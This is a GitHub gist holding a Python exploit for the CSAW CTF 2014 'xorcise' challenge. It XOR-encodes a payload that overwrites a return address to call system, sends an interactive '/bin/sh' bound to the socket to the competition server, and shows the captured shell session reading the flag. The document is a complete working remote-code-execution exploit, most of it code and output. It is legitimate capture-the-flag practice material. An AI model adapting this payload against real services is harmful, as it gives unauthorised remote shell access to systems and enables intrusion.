Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CSAW CTF 2014 - xorcise exploit
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit
def xor(data, key):
o = ''
for i in range(len(data)):
o += chr(ord(data[i]) ^ ord(key[i%len(key)]) ^ 0x8F)
return o
key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system
cmd = "/bin/sh -i <&4 >&4 2>&4"
cmd += "\x00" * (128 - len(cmd))
s = NullSocket("128.238.66.227", 24001)
s.write(chr(135) + key + xor(cmd, key))
s.interactive()
'''
sh: cannot set terminal process group (134): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3$ id
id
uid=1000(xor) gid=1000(xor) groups=1000(xor)
sh-4.3$ ls -la
ls -la
total 44
drwxr-xr-x 2 root root 4096 Sep 20 00:18 .
drwxr-xr-x 3 root root 4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
sh-4.3$ cat flag.txt
ceat flag.txt
flag{code_exec>=crypto_break}
sh-4.3$ exit
exit
exit
*** Connection closed by remote host ***
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.